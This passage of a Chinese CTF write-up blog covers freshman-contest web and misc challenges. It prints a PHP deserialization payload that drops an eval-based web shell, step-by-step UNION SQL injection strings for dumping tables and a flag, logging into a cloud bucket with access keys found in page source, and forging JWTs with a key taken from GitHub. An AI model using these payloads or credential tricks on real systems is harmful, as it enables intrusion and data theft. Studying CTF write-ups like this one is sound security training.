<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">payload：O:6:&quot;gogogo&quot;:1:&#123;s:3:&quot;www&quot;;O:5:&quot;start&quot;:1:&#123;s:5:&quot;coffe&quot;;O:4:&quot;soda&quot;:1:&#123;s:5:&quot;gunmu&quot;;O:3:&quot;end&quot;:2:&#123;s:7:&quot;content&quot;;s:41:&quot;aPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=&quot;;s:8:&quot;filename&quot;;s:49:&quot;php://filter/convert.base64-decode/resource=1.php&quot;;&#125;&#125;&#125;&#125; <br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027202841384.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027202841384.png" alt="image-20251027202841384" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027202849654.png" alt="image-20251027202849654" style="zoom:80%;" />

<p>这样就成功啦直接连接就行</p>
<h2 id="web进阶题1"><a href="#web进阶题1" class="headerlink" title="web进阶题1"></a>web进阶题1</h2><p>用御剑扫了一下目录发现了登录端口一开始会被里面有的前端代码误导因为找半天你会发现你找不到里面可能有的已经加密的密码泄露所以怀疑有登录界面也就是register.html</p>
<p>给的提示也是很明显要自己注册看了一下后台有一段前端代码被注释掉了<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027234455386.png" alt="image-20251027234455386" style="zoom:80%;" /></p>
<p>仔细看你会发现这个就是注册表单，它是有action属性的接下来执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">console.log(&#x27;=== 启用注册表单 ===&#x27;);<br><br>const registerComments = [];<br>const walker = document.createTreeWalker(<br>    document.body,<br>    NodeFilter.SHOW_COMMENT,<br>    null,<br>    false<br>);<br><br>let comment;<br>while (comment = walker.nextNode()) &#123;<br>    if (comment.textContent.includes(&#x27;registerForm&#x27;)) &#123;<br>        registerComments.push(comment);<br>    &#125;<br>&#125;<br><br>if (registerComments.length &gt; 0) &#123;<br>    registerComments.forEach(comment =&gt; &#123;<br>        const tempDiv = document.createElement(&#x27;div&#x27;);<br>        tempDiv.innerHTML = comment.textContent;<br>        comment.parentNode.replaceChild(tempDiv, comment);<br>    &#125;);<br>&#125; <br></code></pre></td></tr></table></figure>

<p>在控制台中执行得到</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027234749956.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027234749956.png" alt="image-20251027234749956" style="zoom:80%;" />

<p>这里建议用burpsuite去注册这样的话才能得到它后台给你的注册信息。</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027235443737.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027235443737.png" alt="image-20251027235443737" style="zoom:80%;" />

<p>主要看那个error这里是中文乱码扔给AI就知道它说啥了，这里我们会得到两个关键信息admin已经被注册了然后就是密码需要大写小写字母加数字后面就会有注册成功然后登入就行</p>
<h2 id="web进阶题2"><a href="#web进阶题2" class="headerlink" title="web进阶题2"></a>web进阶题2</h2><p>在用户登录过后底下会有两个文章一个是关于弱口令的，一个是关于sql注入的，弱口令可以让我们登录admin_lang这个账号，然后我们就可以去用户查询里面去找sql漏洞啦。</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028212912341.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028212912341.png" alt="image-20251028212912341" style="zoom:80%;" />

<p>第一个payload验证sql注入漏洞的存在</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; or &#x27;1&#x27;=&#x27;1<br></code></pre></td></tr></table></figure>

<p>联合注入测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; UNION SELECT 1,2,3,4-- -<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213039898.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213039898.png" alt="image-20251028213039898" style="zoom:80%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; UNION SELECT 1,2,3,database()-- -<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213224851.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213224851.png" alt="image-20251028213224851" style="zoom:80%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- -<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213319665.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213319665.png" alt="image-20251028213319665" style="zoom:80%;" />

<p>这里其实不确定在哪个里面我是都查了不过wp不多说flag在users里面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&#x27; UNION SELECT 1,2,3,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;-- -<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213451114.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213451114.png" alt="image-20251028213451114" style="zoom:80%;" />

<p>找到flag啦</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">group_concat(flag) from users-- -<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213602515.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213602515.png" alt="image-20251028213602515" style="zoom:80%;" />

<h2 id="web进阶3"><a href="#web进阶3" class="headerlink" title="web进阶3"></a>web进阶3</h2><p>主播其实先写的3写出来flag交不了2才发现自己先写的三哈哈哈哈</p>
<p>三主要是在有个挑战的界面里面去看源码就很容易发现</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213752540.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028213752540.png" alt="image-20251028213752540" style="zoom:80%;" />

<p>里面有AK和SK一开始我也不会</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_34851291/article/details/140209099">https://blog.csdn.net/qq_34851291/article/details/140209099</a></p>
<p>去看了这篇文章以后还误把加速服务给当成主机连接对象了（OSS Browser真的能登录的上但是你看不见任何东西因为会出现网络问题），不过这个也给我很大启发那就是云端服务就那么几个而且他们的AK是有明显特征的我可以去试试，于是我在行云管家这里找到了。</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028214028649.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028214028649.png" alt="image-20251028214028649" style="zoom:80%;" />

<p>这是一个华为云主机，对比公网ip你就会发现一模一样不过可惜的是应该是权限不够的问题所以我们没办法直接导入主机会失败。但是华为云肯定是有相应的登入方式的也就是OBS Browser+ AK SK登录以后你就会看到桶了</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028214210212.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028214210212.png" alt="image-20251028214210212" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251028214304893.png" alt="image-20251028214304893" style="zoom:80%;" />

<p>结束。</p>
<h2 id="天才的疏忽"><a href="#天才的疏忽" class="headerlink" title="天才的疏忽"></a>天才的疏忽</h2><p>hint 1</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213458381.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213458381.png" alt="image-20251029213458381" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213539251.png" alt="image-20251029213539251" style="zoom:80%;" />

<p>进去以后直接登录就行</p>
<p>hint2</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213114231.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213114231.png" alt="image-20251029213114231" style="zoom:80%;" />

<p>hint3</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213911504.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213911504.png" alt="image-20251029213911504" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029213937890.png" alt="image-20251029213937890" style="zoom:80%;" />

<p>前端代码执行或者直接访问都行</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214049064.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214049064.png" alt="image-20251029214049064" style="zoom:80%;" />

<p>找到你要构建的权限了</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214113347.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214113347.png" alt="image-20251029214113347" style="zoom:80%;" />

<p>有token这里是jwt加密，加密时需要密钥</p>
<p>找密钥hint2去GitHub里面找</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214232979.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214232979.png" alt="image-20251029214232979" style="zoom:80%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214244867.png" alt="image-20251029214244867" style="zoom:80%;" / class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214244867.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214244867.png" alt="image-20251029214244867" style="zoom:80%;" />

<h2 id="WEB-REV-SQL"><a href="#WEB-REV-SQL" class="headerlink" title="WEB_REV_SQL"></a>WEB_REV_SQL</h2><p>此题在query里忘记过滤了列名直接查询password和username就行</p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="似曾相识但又看不出来"><a href="#似曾相识但又看不出来" class="headerlink" title="似曾相识但又看不出来"></a>似曾相识但又看不出来</h2 class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214651875.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214651875.png" alt="image-20251029214651875" style="zoom:80%;" />





<p>DNA,4的三次方联想到base64编码</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214902334.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029214902334.png" alt="image-20251029214902334" style="zoom:80%;" />







<p>AI神力，一眼粥<br>小写+空格</p>
<p>第二个包是zip伪加密直接工具解开就行</p>
<p>然后你会得到一张图片</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029215613749.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029215613749.png" alt="image-20251029215613749" style="zoom:80%;" />

<p>然后这个图片末端还隐藏了两张图片合理推测双图片盲水印</p>
<p>36142</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029220205160.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251029220205160.png" alt="image-20251029220205160" style="zoom:80%;" />

<p>相当可怕的flag</p>
<h2 id="wireshark的使用"><a href="#wireshark的使用" class="headerlink" title="wireshark的使用"></a>wireshark的使用</h2><p>把那几个灰色的打开追踪流查看就行</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101023949360.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101023949360.png" alt="image-20251101023949360" style="zoom:80%;" /><div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/10/03/AWD%E7%9A%84%E6%94%BB%E4%B8%8E%E9%98%B2/">AWD的攻与防 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a><a onclick="BgmControl()"><svg id="bgm-control" viewBox="0 0 30 34" fill="#18d1ff" style="width: 24px; transition: transform .3s;margin-top: 4px"><path d="M25.998 23.422V11.29h3.999v12.132h-3.999zM19.497 6.234h4.001v22.243h-4.001V6.234zM12.998.867h4v32.978h-4V.867zm-6.5 5.367h4.001v22.243H6.498V6.234zm-6.5 5.056h4v12.132h-4V11.29z"></path></svg><audio id="bgm" src="/audio/bgm1.mp3" autoplay loop crossorigin="anonymous"> </audio></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://media.prts.wiki/c/cc/%E5%A4%B4%E5%83%8F_%E8%89%BE%E9%9B%85%E6%B3%95%E6%8B%89.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">wOyOm</a></h1><div id="description"><p>记录web学习</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%B0%E7%94%9F%E8%B5%9B"><span class="toc-number">1.</span> <span class="toc-text">新生赛</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB-SSRF-MAIN"><span class="toc-number">1.1.</span> <span class="toc-text">WEB_SSRF_MAIN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB-REV-RCE"><span class="toc-number">1.2.</span> <span class="toc-text">WEB-REV-RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web5-%E7%AE%80%E5%8D%95%E7%9A%84%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.3.</span> <span class="toc-text">web5-简单的文件包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web6-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%9A%84%E9%97%A8%E6%A7%9B"><span class="toc-number">1.4.</span> <span class="toc-text">web6-文件上传的门槛</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB7"><span class="toc-number">1.5.</span> <span class="toc-text">WEB7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web8-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD"><span class="toc-number">1.6.</span> <span class="toc-text">web8-任意文件下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mycookie"><span class="toc-number">1.7.</span> <span class="toc-text">mycookie</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Spring"><span class="toc-number">1.8.</span> <span class="toc-text">Spring</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UNSER"><span class="toc-number">1.9.</span> <span class="toc-text">UNSER</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E8%BF%9B%E9%98%B6%E9%A2%981"><span class="toc-number">1.10.</span> <span class="toc-text">web进阶题1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E8%BF%9B%E9%98%B6%E9%A2%982"><span class="toc-number">1.11.</span> <span class="toc-text">web进阶题2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E8%BF%9B%E9%98%B63"><span class="toc-number">1.12.</span> <span class="toc-text">web进阶3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%A9%E6%89%8D%E7%9A%84%E7%96%8F%E5%BF%BD"><span class="toc-number">1.13.</span> <span class="toc-text">天才的疏忽</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB-REV-SQL"><span class="toc-number">1.14.</span> <span class="toc-text">WEB_REV_SQL</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MISC"><span class="toc-number">2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%BC%E6%9B%BE%E7%9B%B8%E8%AF%86%E4%BD%86%E5%8F%88%E7%9C%8B%E4%B8%8D%E5%87%BA%E6%9D%A5"><span class="toc-number">2.1.</span> <span class="toc-text">似曾相识但又看不出来</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#wireshark%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">2.2.</span> <span class="toc-text">wireshark的使用</span></a></li></ol></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>